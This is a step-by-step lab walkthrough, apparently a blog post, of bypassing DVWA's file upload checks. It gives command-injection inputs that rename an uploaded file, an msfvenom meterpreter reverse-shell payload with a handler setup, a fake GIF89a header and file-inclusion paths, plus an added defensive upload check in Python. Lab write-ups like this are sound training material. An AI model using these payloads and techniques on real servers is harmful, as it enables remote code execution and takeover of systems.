Preface
File upload vulnerabilities usually stem from a lack of strict filtering and inspection of the type and content of uploaded files, which lets an attacker upload a webshell (a "Trojan" file) and obtain command execution on the server. The damage caused by file upload vulnerabilities is therefore often devastating. Apache, Tomcat, Nginx and others have all had file upload vulnerabilities disclosed.
Exploiting a file upload vulnerability has preconditions. First, the webshell file must be uploaded successfully. Second, the uploaded file must be executable by the server. Finally, the path of the uploaded file must be known.
The lab I tested is an all-in-one lab built with docker-compose on a CentOS 7 system. Lab environments differ, so the tools used may not be able to connect; I hope everyone understands, thank you.
Low level exploitation
1. Write a one-line PHP webshell, q.php
2. Upload it
3. Connect with China Chopper
Specify the connection URL as http://192.168.5.199/hackable/uploads/q.php, the parameter as cmd, and the type as PHP(eval)
4. Double-click the newly added entry
5. Access to the target site directory is obtained
Medium level
The Medium-level code restricts the type and size of uploaded files: the Content-Type must be jpeg or png, and the size cannot exceed 100000 B (about 97.6 KB)
First capture the upload request and modify the file type. A one-line webshell is far below the size limit, so the size restriction does not matter.
1. Rename the q.php from the Low level above to w.png (jpeg or png both work here)
2. Upload w.png with packet capture turned on
3. In the intercepted request, change the suffix of the uploaded file name (w.png to w.php) and click Forward to complete the upload
4. Upload succeeds
5. Connect with China Chopper
Specify the connection URL http://192.168.5.199/hackable/uploads/w.php, the parameter is cmd, and the type is PHP(eval)
High level
The High-level code reads the last part of the file name (the extension) and tries to limit the file type by name, so the uploaded file name must end in .jpg, .jpeg or .png. At the same time, the getimagesize function requires the file header of the uploaded file to be that of an image
What is a file header?
The file header is a section of data at the start of a file that serves a specific purpose
It describes some important attributes of the file and tells the program that opens and processes the file what those attributes are
File headers of common file types (hexadecimal):
JPEG (jpg), file header: FFD8FF
PNG (png), file header: 89504E47
GIF (gif), file header: 47494638
HTML (html), file header: 68746D6C3E
MS Word/Excel (xls or doc), file header: D0CF11E0
Quicken (qdf), file header: AC9EBD8F
ZIP Archive (zip), file header: 504B0304
RAR Archive (rar), file header: 52617221
Executable file (EXE), file header: MZ
There are several methods here; I will go through them one by one
(1) Hide the webshell in a picture and bypass the check (High file upload + Low command injection)
1. First rename the image webshell w.png used at Medium level to c.php, then use the copy command to merge the webshell file c.php and the image file e.png into t.png
copy e.png /b + c.php /a t.png
As you can see, the one-line webshell is appended to the end of the picture
2. Upload succeeds
3. Select Command Injection
4. Use command injection to list the upload directory
127.0.0.1|ls ../../hackable/uploads
6. Then enter the following command through command injection to change the file suffix
127.0.0.1|mv ../../hackable/uploads/t.png ../../hackable/uploads/t.php
7. Then connect with China Chopper
(Because the router was restarted, the IP address has changed here; don't worry, the operation is the same as at the Low level above)
Specify the connection URL http://192.168.5.129/hackable/uploads/t.php, the parameter is cmd, and the type is PHP(eval)
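As an added example (not code from the original page or from DVWA), the following Python check applies the file header list above the way a defender would: it whitelists the extension, requires the leading bytes to match that extension, and scans the whole file for PHP open tags, so an image with a webshell appended (the copy /b trick) and a text or msfvenom payload that merely starts with GIF89a are both rejected. All sample inputs are constructed and contain no real payload.

```python
import re

# Magic numbers taken from the file header list above (hex -> bytes).
MAGIC = {
    "jpg": bytes.fromhex("FFD8FF"),
    "jpeg": bytes.fromhex("FFD8FF"),
    "png": bytes.fromhex("89504E47"),
    "gif": bytes.fromhex("47494638"),   # "GIF8", covers GIF87a and GIF89a
}
ALLOWED_EXT = {"jpg", "jpeg", "png"}        # the High-level extension whitelist
# PHP open tags: "<?php" or the short echo tag "<?=" anywhere in the file.
PHP_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)


def check_upload(filename: str, data: bytes) -> str:
    """Return 'ok' if the upload looks like a plain image, else the reason."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_EXT:           # q.php, or w.png renamed to w.php in transit
        return "extension not allowed"
    if not data.startswith(MAGIC[ext]):  # a GIF89a text file named 00.jpg fails here
        return "file header does not match extension"
    if PHP_TAG.search(data):             # image with PHP code appended (copy /b)
        return "embedded PHP code"
    return "ok"


# Constructed samples: a minimal PNG signature plus filler, the same image with
# a harmless PHP block appended, and a GIF89a-prefixed text file.
CLEAN_PNG = bytes.fromhex("89504E470D0A1A0A") + b"\x00" * 32
APPENDED_PNG = CLEAN_PNG + b"<?php /* appended code */ ?>"
FAKE_GIF_TXT = b"GIF89a;\n<?php /* code after fake header */ ?>"


def demo() -> dict:
    """Run the check over the constructed samples; values are the verdicts."""
    return {
        "e.png": check_upload("e.png", CLEAN_PNG),
        "t.png": check_upload("t.png", APPENDED_PNG),
        "00.jpg": check_upload("00.jpg", FAKE_GIF_TXT),
        "any.png": check_upload("any.png", FAKE_GIF_TXT),
        "w.php": check_upload("w.php", CLEAN_PNG),
    }


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name}: {verdict}")
```

The header-versus-extension comparison matters because getimagesize alone accepts a GIF-headed file regardless of its .jpg name, which is exactly what the GIF89a tricks on this page rely on. Storing uploads outside the web root and serving them without script execution closes the remaining gap that a renamed file would otherwise exploit.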
(2) Add a GIF89a fake image header to a PHP payload generated by msfvenom to bypass the check (High file upload + Low file inclusion)
Note: tested on Kali
1. First use msfvenom to generate a PHP payload saved as a PNG file
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.5.214 lport=3333 >> any.png
2. Upload the image payload
3. Upload fails
The error message in English is: Your image has not been uploaded, we can only accept JPEG or PNG images.
4. Then use the VIM editor (any editor works) to add the string GIF89a at the head of the sam.png image payload
5. Upload the picture again; this time it succeeds
6. Enter msfconsole in the terminal to open the console
7. Then enter the following commands
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lport 3333
set lhost 192.168.5.214
exploit
8. Then select File Inclusion at Low level
10. Enter the following address in the address bar and press Enter
192.168.5.129/vulnerabilities/fi/?page=../../hackable/uploads/any.png
11. A session appears in msfconsole
12. Then use commands to check what files are in the /hackable/uploads directory
13. Then I test it by trying to delete a file at random to see whether there is permission. The test succeeds
(3) Hide the webshell in a picture and bypass the check (High file upload + Low file inclusion)
1. First create a txt file, enter the GIF89a; fake image header and a one-line PHP webshell, then rename it to 00.jpg
2. Upload 00.jpg
3. Change the security level to Low
4. Select File Inclusion and enter the following in the address bar, but don't press Enter yet!!!
http://192.168.5.129/vulnerabilities/fi/?page=../../hackable/uploads/00.jpg
5. Open Burp Suite for packet capture. Pay attention here: click the button to turn on interception and don't close it in a hurry!!!
Copy the Cookie line
6. Open China Chopper
Specify the connection URL http://192.168.5.129/vulnerabilities/fi/?page=../../hackable/uploads/00.jpg, the parameter is cmd, the type is PHP(eval), and the character encoding is GB2312
7. Right-click in a blank area of China Chopper and click Settings
8. Set the request header: paste the Cookie value captured in Burp Suite, following the numbered order in the figure
9. Double-click the newly added entry
10. Access to the target site directory is obtained
11. I found that the 00.jpg file I just uploaded is there, and then tested whether I have permission to delete files. I deleted a file for testing and it succeeded.